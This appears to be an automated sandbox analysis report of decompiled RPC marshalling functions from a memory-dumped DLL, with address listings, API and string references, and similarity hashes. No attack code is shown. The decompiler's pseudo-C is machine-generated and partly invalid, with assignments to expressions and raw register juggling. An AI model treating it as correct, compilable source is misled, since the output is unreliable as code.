                                                                                                • Opcode ID: ccf16af2322fff6f1779564879cb0a22d0bed9f83c08f10c35b53ebcac639b0e
                                                                                                • Instruction ID: d7546ea38672435527c258e4fa4f298cbe7dbcd98cfaefc1574d840663b3973d
                                                                                                • Opcode Fuzzy Hash: ccf16af2322fff6f1779564879cb0a22d0bed9f83c08f10c35b53ebcac639b0e
                                                                                                • Instruction Fuzzy Hash: 29314FB5A04148EFCB04CF99D8809AE7BB5AF89204F148558F9199B345E330EB11CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4490, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA4490(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				void* _t40;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				0x6eda0000("(pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)\n", _a4,  *_a8, _a12, _a16 & 0x000000ff);
				_t64 = _t63 + 0x14;
				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
					_t64 = _t64 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				if(( *_a12 & 0x000000ff) != 0x22) {
					E6EDAD650(0x25, _a4, _a12);
					E6EDAD830(_t40, _t61, _t62, 0x25, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
				} else {
					E6EDAD650(0x22, _a4, _a12);
					E6EDAD830(_t40, _t61, _t62, 0x22, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
				}
				return 0;
			}








                                                                                                0x6eda44ab
                                                                                                0x6eda44b0
                                                                                                0x6eda44c5
                                                                                                0x6eda44e7
                                                                                                0x6eda44ec
                                                                                                0x6eda44f4
                                                                                                0x6eda44f4
                                                                                                0x6eda450c
                                                                                                0x6eda454b
                                                                                                0x6eda456a
                                                                                                0x6eda450e
                                                                                                0x6eda4518
                                                                                                0x6eda4537
                                                                                                0x6eda453c
                                                                                                0x6eda4575

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA44F4
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u), xrefs: 6EDA44A6
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA44E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, *pMemory == ^%p, pFormat == ^%p, fMustAlloc == %u)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-339230053
                                                                                                • Opcode ID: a76abc7bbbb805cc9200d0cfcc83bb6db54a35e8f07dff5b84a3802d284b7e7e
                                                                                                • Instruction ID: 041b5e5a6e42387d8b70f1a952c96a817d41e727355b6b2046fa34520704a62a
                                                                                                • Opcode Fuzzy Hash: a76abc7bbbb805cc9200d0cfcc83bb6db54a35e8f07dff5b84a3802d284b7e7e
                                                                                                • Instruction Fuzzy Hash: 5A21BFB16042856BD704CF98DC91EBB37AEAB89704F048418FE198B2C2D671DA61CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA60F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA60F0(intOrPtr _a4, signed char* _a8) {
				signed char* _v8;
				signed int _v12;
				signed char* _v16;

				_v8 = _a8;
				0x6eda0000("(%p, %p)\n", _a4, _a8);
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v16 = _a8;
						_v12 =  *((intOrPtr*)(_v16 + 2));
						_a8 = _v16 + 6;
					} else {
						_v12 = _v8[2] & 0x0000ffff;
						_a8 =  &(_v8[4]);
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					E6EDAAF00(_a4, _v12);
					 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v12;
					E6EDAC7E0(_a4, _a8);
					return _v12;
				} else {
					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}






                                                                                                0x6eda60f9
                                                                                                0x6eda6109
                                                                                                0x6eda611a
                                                                                                0x6eda615f
                                                                                                0x6eda6170
                                                                                                0x6eda618a
                                                                                                0x6eda6193
                                                                                                0x6eda619c
                                                                                                0x6eda6172
                                                                                                0x6eda6179
                                                                                                0x6eda6182
                                                                                                0x6eda6182
                                                                                                0x6eda61a8
                                                                                                0x6eda61b3
                                                                                                0x6eda61c7
                                                                                                0x6eda61d2
                                                                                                0x00000000
                                                                                                0x6eda6127
                                                                                                0x6eda6133
                                                                                                0x6eda6140
                                                                                                0x00000000
                                                                                                0x6eda6146

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6140
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: ca7efb92246d78721c76b3d4cf709a71e7f400176bb5c09a644d221b7537c67e
                                                                                                • Instruction ID: 1851269300e78767c6d47200213c10f4e40ca84a442ca0fb40e51eea0e1a6acb
                                                                                                • Opcode Fuzzy Hash: ca7efb92246d78721c76b3d4cf709a71e7f400176bb5c09a644d221b7537c67e
                                                                                                • Instruction Fuzzy Hash: 99312CB5A00108EFCB04CF99C8909ADBBB6AF89255F14C199F9599B346D730EF50DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1E40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA1E40(signed int _a4, WCHAR* _a8, signed char* _a12) {
				void* _t60;
				void* _t61;

				0x6eda0000("(pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p)\n", _a4, _a8, _a12);
				_t61 = _t60 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
					_t61 = _t61 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				if(( *_a12 & 0x000000ff) != 0x22) {
					E6EDAD120(0x25, _a4, _a8, _a12);
					E6EDAD360(0x25, _a4, _a8, _a12, 1);
				} else {
					E6EDAD120(0x22, _a4, _a8, _a12);
					E6EDAD360(0x22, _a4, _a8, _a12, 1);
				}
				return 0;
			}





                                                                                                0x6eda1e54
                                                                                                0x6eda1e59
                                                                                                0x6eda1e6e
                                                                                                0x6eda1e99
                                                                                                0x6eda1e9e
                                                                                                0x6eda1ea6
                                                                                                0x6eda1ea6
                                                                                                0x6eda1ebe
                                                                                                0x6eda1efe
                                                                                                0x6eda1f16
                                                                                                0x6eda1ec0
                                                                                                0x6eda1ece
                                                                                                0x6eda1ee6
                                                                                                0x6eda1eeb
                                                                                                0x6eda1f21

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1EA6
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p), xrefs: 6EDA1E4F
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA1E94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-1435394972
                                                                                                • Opcode ID: 2abb68813644048d06b95a8fb4a38e19bdf564522ab94cd0e3dba40e4be6b5d2
                                                                                                • Instruction ID: a003769449b1b4a4a48cb4b158d73fcd1affc139907e83cbd11e28b028774883
                                                                                                • Opcode Fuzzy Hash: 2abb68813644048d06b95a8fb4a38e19bdf564522ab94cd0e3dba40e4be6b5d2
                                                                                                • Instruction Fuzzy Hash: 842153B6604145ABD704DFDCDC51EBB376EAB89704F048418FF198B2C6D631EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA57A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA57A0(int _a4, WCHAR* _a8, signed char* _a12) {
				void* _t59;
				void* _t60;

				0x6eda0000("(pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)\n", _a4, _a8, _a12);
				_t60 = _t59 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
					_t60 = _t60 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				if(( *_a12 & 0x000000ff) != 0x22) {
					E6EDACC40(0x25, _a4, _a8, _a12);
					return E6EDACE70(0x25, _a4, _a8, _a12, 1);
				} else {
					E6EDACC40(0x22, _a4, _a8, _a12);
					return E6EDACE70(0x22, _a4, _a8, _a12, 1);
				}
			}





                                                                                                0x6eda57b4
                                                                                                0x6eda57b9
                                                                                                0x6eda57ce
                                                                                                0x6eda57f9
                                                                                                0x6eda57fe
                                                                                                0x6eda5806
                                                                                                0x6eda5806
                                                                                                0x6eda581e
                                                                                                0x6eda585e
                                                                                                0x00000000
                                                                                                0x6eda5820
                                                                                                0x6eda582e
                                                                                                0x00000000
                                                                                                0x6eda584b

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA5806
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA57AF
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA57F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-3061728
                                                                                                • Opcode ID: 70d6fe2d53c98d0e99498f11185db3fb0379b456d224e25794ba7e7c0eb1abbc
                                                                                                • Instruction ID: 091e8e6e8a434da9d81348379e28df56016ac42c28464b219001e7e40a2067dc
                                                                                                • Opcode Fuzzy Hash: 70d6fe2d53c98d0e99498f11185db3fb0379b456d224e25794ba7e7c0eb1abbc
                                                                                                • Instruction Fuzzy Hash: 3E214FB6600145ABE704DF9CDC91EBB376AAB89700F148418FA198F282D631EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA99D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDA99D4() {
				void* _t246;
				void* _t248;
				void* _t250;

				L0:
				while(1) {
					L0:
					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
					 *((intOrPtr*)(_t246 - 0x18)) = E6EDAE3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
					0x6eda0000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
					_t250 = _t248 + 0x14;
					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
						E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
					}
					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6edbb418 + ( *( *(_t246 - 8)) & 0x7f) * 4));
					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
						0x6eda0000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
						_t250 = _t250 + 8;
					} else {
						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
						} else {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
						}
					}
					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					L1:
					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
						if( *(_t246 - 0xc) > 0xb8) {
							L46:
							0x6eda0000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
							_t250 = _t250 + 8;
							L47:
							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
							continue;
						}
						L3:
						_t23 =  *(_t246 - 0xc) + 0x6eda9b24; // 0xcccccc0f
						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
							case 0:
								L4:
								E6EDAAFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
								_push( *(_t246 + 0xc));
								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
								_push("byte=%d => %p\n");
								0x6eda0000();
								_t250 = _t250 + 0x18;
								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
								goto L47;
							case 1:
								L5:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
								_push("short=%d => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 2;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 2:
								L9:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("long=%d => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 3:
								L12:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								asm("cvtss2sd xmm0, [eax]");
								__esp = __esp - 8;
								asm("movsd [esp], xmm0");
								_push("float=%f => %p\n");
								0x6eda0000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 4:
								L13:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__edx + 4);
								_push(__eax);
								__ecx =  *__edx;
								_push(__ecx);
								0x6eda0000();
								__esp = __esp + 8;
								_push(__eax);
								_push("longlong=%s => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								goto L47;
							case 5:
								L14:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__esp = __esp - 8;
								asm("movsd xmm0, [eax]");
								asm("movsd [esp], xmm0");
								_push("double=%f => %p\n");
								0x6eda0000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 6:
								L6:
								__edx = __ebp - 4;
								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
								__ecx =  *(__ebp - 4) & 0x0000ffff;
								__edx =  *(__ebp + 0xc);
								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("enum16=%d => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								__eax =  *(__ebp + 0xc);
								if( *( *(__ebp + 0xc)) > 0x7fff) {
									_push(0x6f5);
									__imp__RpcRaiseException();
								}
								L8:
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 7:
								L15:
								 *(__ebp - 0x1c) = 0;
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								_push("pointer => %p\n");
								0x6eda0000();
								__esp = __esp + 8;
								__eax =  *(__ebp + 0x10);
								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
									__edx =  *(__ebp + 0x10);
									 *(__ebp + 0x14) =  *(__ebp + 0x10);
								}
								__eax =  *(__ebp + 0x14);
								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
								if(__ecx != 0x11) {
									 *(__ebp + 8) =  *(__ebp + 8) + 4;
									__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
								}
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								 *(__ebp - 0x20) =  *(__eax + 4);
								__edx =  *(__ebp + 8);
								if( *( *(__ebp + 8) + 0x34) == 0) {
									__ecx =  *(__ebp + 0x14);
									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
									}
								} else {
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 0x34);
									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
									__eax =  *(__ebp + 8);
									 *( *(__ebp + 8) + 0x34) = 0;
									 *(__ebp - 0x1c) = 1;
								}
								__ecx =  *(__ebp + 0x18) & 0x000000ff;
								__edx =  *(__ebp + 0x14);
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__ebp - 0x20);
								__ecx =  *(__ebp + 8);
								__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
								if( *(__ebp - 0x1c) == 0) {
									L29:
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
									} else {
										__ecx =  *(__ebp + 0x14);
										__ecx =  *(__ebp + 0x14) + 4;
										 *(__ebp + 0x14) = __ecx;
									}
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									goto L47;
								} else {
									do {
										L24:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 0x14);
										_push( *(__edx + 0x14));
										__ecx =  *(__ebp + 8);
										__edx =  *( *(__ebp + 8));
										__eax =  *(__ebp + 8);
										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
										_push( *(__eax + 4) -  *(__edx + 8));
										_push("buffer=%d/%d\n");
										0x6eda0000();
										__esp = __esp + 0xc;
										__edx =  *(__ebp + 8);
										__eax =  *( *(__ebp + 8));
										__ecx =  *(__eax + 8);
										__edx =  *(__ebp + 8);
										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
										__eax =  *(__ebp + 8);
										if( *( *(__ebp + 8) + 4) > __ecx) {
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__edx + 8);
											__ecx =  *(__ebp + 8);
											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__edx =  *(__ebp + 8);
											 *(__edx + 4) =  *(__edx + 4) - __eax;
											_push( *(__edx + 4) - __eax);
											_push("buffer overflow %d bytes\n");
											0x6eda0000();
											__esp = __esp + 8;
										}
										__edx = 0;
									} while (0 != 0);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 4);
									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp - 0x20);
									 *( *(__ebp + 8) + 4) = __ecx;
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__eax = E6EDAAF00( *(__ebp + 8), 4);
									}
									goto L29;
								}
							case 8:
								L33:
								__ecx =  *(__ebp - 0x10);
								__edx = __ebp + 0xc;
								__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
								goto L47;
							case 9:
								L34:
								__eax =  *(__ebp - 0x10);
								__ecx = __ebp + 0xc;
								__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
								goto L47;
							case 0xa:
								L35:
								__edx =  *(__ebp - 0x10);
								__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
								goto L47;
							case 0xb:
								L36:
								__ecx =  *(__ebp + 0x10);
								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
								__ecx =  *(__ebp + 0x10);
								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 0xc:
								goto L0;
							case 0xd:
								L45:
								goto L47;
							case 0xe:
								L10:
								__edx = __ebp - 0x24;
								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
								__ecx =  *(__ebp + 0xc);
								__edx =  *(__ebp - 0x24);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *__ecx;
								_push( *__ecx);
								_push("int3264=%ld => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0xf:
								L11:
								__ecx = __ebp - 0x28;
								__edx =  *(__ebp + 8);
								E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
								__ecx =  *(__ebp - 0x28);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								_push(__ecx);
								_push("uint3264=%ld => %p\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
								goto L47;
							case 0x10:
								goto L46;
						}
					}
					return  *(_t246 + 0xc);
				}
			}






                                                                                                0x6eda99d4
                                                                                                0x6eda99d4
                                                                                                0x6eda99d4
                                                                                                0x6eda99e6
                                                                                                0x6eda99ef
                                                                                                0x6eda99fb
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a62
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad1
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
